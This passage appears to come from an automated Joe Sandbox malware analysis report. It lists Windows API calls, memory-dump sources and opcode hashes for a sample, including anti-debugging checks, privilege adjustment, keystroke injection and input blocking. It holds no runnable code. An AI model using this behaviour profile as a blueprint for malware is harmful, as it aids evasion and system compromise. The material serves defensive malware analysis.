                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: f9366f6474de9c52feb160dcf0b84914c9f4cf1557d65b8f56c127088192d660
                                                        • Instruction ID: 2a7aa1cd79dff489cca7e8fef215b72bb1f7b3894cb037489048bd9a19bd74df
                                                        • Opcode Fuzzy Hash: f9366f6474de9c52feb160dcf0b84914c9f4cf1557d65b8f56c127088192d660
                                                        • Instruction Fuzzy Hash: 8E31E3B1A40358FEFF358A68CC09BFA7BEAAB44310F04831AE585965D1D37D8981C766
                                                        APIs
                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0071CE89
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0071CEEA
                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 0071CEFE
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorEventFileInternetLastRead
                                                        • String ID:
                                                        • API String ID: 234945975-0
                                                        • Opcode ID: a2e47827b108a0cc31558d3e39c6743061628627ca4b7df3ffe6e56d124f7c23
                                                        • Instruction ID: 4a5b515f33e8cae49efa8089e5245ae33c40f08e582d6e4ed54de5c17234f069
                                                        • Opcode Fuzzy Hash: a2e47827b108a0cc31558d3e39c6743061628627ca4b7df3ffe6e56d124f7c23
                                                        • Instruction Fuzzy Hash: 5721C1B25403059BE732CFA9C949BA7B7FDEB00314F10841EE546E2191E778EE898B94
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 006D271A
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006D2724
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 006D2731
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: 360ede8d9f591d8de36dc7886c70b6a16014ae8f4667c6816fe02721d1dc1067
                                                        • Instruction ID: 82129e98ceb914254db507af9767c37e66a9ef1b6a7019d6d33ef44b6f064c79
                                                        • Opcode Fuzzy Hash: 360ede8d9f591d8de36dc7886c70b6a16014ae8f4667c6816fe02721d1dc1067
                                                        • Instruction Fuzzy Hash: 5631C475901219ABCB61DF64DC88BD9BBB9EF18310F5041EAE81CA7261E7349F818F49
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 007151DA
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00715238
                                                        • SetErrorMode.KERNEL32(00000000), ref: 007152A1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: 425ebe74e7c0049e3e75ad3c89df0288cc21452a36fc839be6be507261a8a33d
                                                        • Instruction ID: 6c2f15cdca38c03f3aeb3e2ec927e73b73a19bae3730dfee2146c717a21ebcb1
                                                        • Opcode Fuzzy Hash: 425ebe74e7c0049e3e75ad3c89df0288cc21452a36fc839be6be507261a8a33d
                                                        • Instruction Fuzzy Hash: C4314C75A00618DFDB00EF54D884EADBBB5FF49314F088099E805AB3A2DB35EC55CBA4
                                                        APIs
                                                          • Part of subcall function 006BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006C0668
                                                          • Part of subcall function 006BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006C0685
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
                                                        • GetLastError.KERNEL32 ref: 0070174A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                        • String ID:
                                                        • API String ID: 577356006-0
                                                        • Opcode ID: f7bc4d627b391589d0e16ed224c204c61e67137e90c5ee37489bd426b08f56dd
                                                        • Instruction ID: c20e52b808bc765f376d7aee92f599ec042f5bb52a514c3adfb35487246663b1
                                                        • Opcode Fuzzy Hash: f7bc4d627b391589d0e16ed224c204c61e67137e90c5ee37489bd426b08f56dd
                                                        • Instruction Fuzzy Hash: D611CEB2400304EFE718AF54DC86DAAB7F9EF04714B20862EE05653291EB75FC818B24
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0070D608
                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0070D645
                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0070D650
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                        • String ID:
                                                        • API String ID: 33631002-0
                                                        • Opcode ID: f0ab25f5df96f83bfbfce2293abae31f90fa59c2f773f4798e8c491f971c77a2
                                                        • Instruction ID: e9707ec8740eb557732030d41d2a22dde7409bb384ad1c28fa7e1104e7f4a313
                                                        • Opcode Fuzzy Hash: f0ab25f5df96f83bfbfce2293abae31f90fa59c2f773f4798e8c491f971c77a2
                                                        • Instruction Fuzzy Hash: 07113C75E05228BBEB218F959C45FAFBBBCEB45B50F108115F904E7290D6744A058BA1
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0070168C
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007016A1
                                                        • FreeSid.ADVAPI32(?), ref: 007016B1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 2c4a971b46f591e69d2ab05b887dd78da1dded3b6fb54cbc138405cfa4aa39b5
                                                        • Instruction ID: 452b0e85089ff896b44f52b8a94e1dcf1ad64072683e0569eae5b810ff8ce9de
                                                        • Opcode Fuzzy Hash: 2c4a971b46f591e69d2ab05b887dd78da1dded3b6fb54cbc138405cfa4aa39b5
                                                        • Instruction Fuzzy Hash: 85F0F47195030DFBEB00DFE49D89AAEBBBCEB08705F508565E601E2181E778AA448B54
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000,?,006D28E9), ref: 006C4D09
                                                        • TerminateProcess.KERNEL32(00000000,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000,?,006D28E9), ref: 006C4D10
                                                        • ExitProcess.KERNEL32 ref: 006C4D22
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: b4c59affcc6aea63764ef6c43d89e639ddf5b164e1c03de4d4f490dd340bfd2d
                                                        • Instruction ID: fac4cfefb995b5db96842d5655a92f12fd2bffe5817c434e8b2ccf7f6a35c7e3
                                                        • Opcode Fuzzy Hash: b4c59affcc6aea63764ef6c43d89e639ddf5b164e1c03de4d4f490dd340bfd2d
                                                        • Instruction Fuzzy Hash: 49E0BF31400148ABDF12BF54DD19F983B6AEF41752B108418FC059A222CB39ED51DB45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /
                                                        • API String ID: 0-2043925204
                                                        • Opcode ID: b2b5a3698079203754dcaad065da7ee16d7074f619b764fc621feda29b49b144
                                                        • Instruction ID: 0654882f93841b4802c39e36e9e0476024e8b2a3d98a01bda4daad49019059f8
                                                        • Opcode Fuzzy Hash: b2b5a3698079203754dcaad065da7ee16d7074f619b764fc621feda29b49b144
                                                        • Instruction Fuzzy Hash: 8B41077690021A6BCB249FB9CC49DFB77BAEB84324F10426EF905D7380E6719E41CB54
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 006FD28C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID: X64
                                                        • API String ID: 2645101109-893830106
                                                        • Opcode ID: 2e77ff26d8f6f15d6b1e20184bce4ef7e60c9ae3a00ca8495e59fc507fdd9ad3
                                                        • Instruction ID: b151787dcd9bd1ad6c5a9df3371e56b2e43566d6f370f890789566abfb20119d
                                                        • Opcode Fuzzy Hash: 2e77ff26d8f6f15d6b1e20184bce4ef7e60c9ae3a00ca8495e59fc507fdd9ad3
                                                        • Instruction Fuzzy Hash: 89D0C9B480111DEACB94DB90DC88DE9B37DBB04305F104151F206A2000D73496498F10
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                        • Instruction ID: 72eaf6ead7c1603456a45eb2c977c0f47fd97d4780100a44f883ebf7a141a2bf
                                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                        • Instruction Fuzzy Hash: B7020C71E012199BDF14CFA9C980BEDBBF2EF49324F25416ED819EB384D731A9418B94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Variable is not of type 'Object'.$p#w
                                                        • API String ID: 0-2679264178
                                                        • Opcode ID: 2c5a0f85ad0111f110e0e385abd1edce5ecab1afe3ca00df33b671e31c64a381
                                                        • Instruction ID: 0c9a68b88ca0f5154dd059afdb191f21e4326c43340447c7b23a2f1340fd916d
                                                        • Opcode Fuzzy Hash: 2c5a0f85ad0111f110e0e385abd1edce5ecab1afe3ca00df33b671e31c64a381
                                                        • Instruction Fuzzy Hash: 17326970900218DFDF14EF94C995AEDB7B6BF06324F148059E906AB292DB35AE46CF60
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00716918
                                                        • FindClose.KERNEL32(00000000), ref: 00716961
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: f65f3ac495206ccc31e70c04708f3f1ff71a792dfe051bef7d1075e438a91a82
                                                        • Instruction ID: b06c61a7e56c3c22db5e93c8e9d760f5784ee82298e4b73481c8058d18c9d44d
                                                        • Opcode Fuzzy Hash: f65f3ac495206ccc31e70c04708f3f1ff71a792dfe051bef7d1075e438a91a82
                                                        • Instruction Fuzzy Hash: 1F1190716042109FD710DF29D885A16BBE5FF85329F14C69DE8698F2A2CB34EC45CB91
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00724891,?,?,00000035,?), ref: 007137E4
                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00724891,?,?,00000035,?), ref: 007137F4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: a929d41310605d2ba7665b5be4b1a90fab1dc715931689351338866de993c8d7
                                                        • Instruction ID: 96491131d07fb1520261e7f0fae0a04a081202817b39aaa5b30cd65bf441ee64
                                                        • Opcode Fuzzy Hash: a929d41310605d2ba7665b5be4b1a90fab1dc715931689351338866de993c8d7
                                                        • Instruction Fuzzy Hash: FCF0E5B16053282AE760276A8C8DFEB3AAEEFC5761F004275F509E22C1D9709D44C7B4
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0070B25D
                                                        • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 0070B270
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: InputSendkeybd_event
                                                        • String ID:
                                                        • API String ID: 3536248340-0
                                                        • Opcode ID: fd2ca1d65edf3dc9069eb025b35a631d65bb6cdbcd695eb82fbe924a478f57ce
                                                        • Instruction ID: aea4b074a3ac3f04c0e0650a50bcba916b325783939dd3fc987f196e21198a65
                                                        • Opcode Fuzzy Hash: fd2ca1d65edf3dc9069eb025b35a631d65bb6cdbcd695eb82fbe924a478f57ce
                                                        • Instruction Fuzzy Hash: A8F01D7180424DEBEB059FA0C805BAE7BB4FF08305F108009F955A5191C37D86119F94
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007011FC), ref: 007010D4
                                                        • CloseHandle.KERNEL32(?,?,007011FC), ref: 007010E9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 03db9b46f124d182c3d1ba37505a9c8f8aa047bc9081ec0adf57d5dd3516253b
                                                        • Instruction ID: d1970fe0007bf09ca353169a7f71f05e2a11eab8476e86f5b4c2025cab291ea5
                                                        • Opcode Fuzzy Hash: 03db9b46f124d182c3d1ba37505a9c8f8aa047bc9081ec0adf57d5dd3516253b
                                                        • Instruction Fuzzy Hash: CEE04F72004610EEF7262B11FC05EB377E9EF04311B10C82DF4A5804B1DB62ACE0DB14
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006D6766,?,?,00000008,?,?,006DFEFE,00000000), ref: 006D6998
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
                                                        • Opcode ID: ddcedb095aeb0ef60ac9231020b314afc5eeb7427af04a027011a2a3798c3466
                                                        • Instruction ID: d0a71075a0ecf798b2b420c7de3f02319666d723476ece573864ebbc95f7c385
                                                        • Opcode Fuzzy Hash: ddcedb095aeb0ef60ac9231020b314afc5eeb7427af04a027011a2a3798c3466
                                                        • Instruction Fuzzy Hash: F3B14A31A106099FD715CF28C486BA57BA1FF45364F298659F8DACF3A2C335E982CB40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: f46b6157c0091ee5cde96481e191aca1e8a21aced17f0ece02adb74db63867c7
                                                        • Instruction ID: 30eec812021445e9a54589fea8b8cae271ff40b11545dabfc65b7bcdcf654dc2
                                                        • Opcode Fuzzy Hash: f46b6157c0091ee5cde96481e191aca1e8a21aced17f0ece02adb74db63867c7
                                                        • Instruction Fuzzy Hash: 9B125FB19002299FDB24CF58C8816FEB7F6FF48710F14819AE949EB255DB749E81CB90
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 0071EABD
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
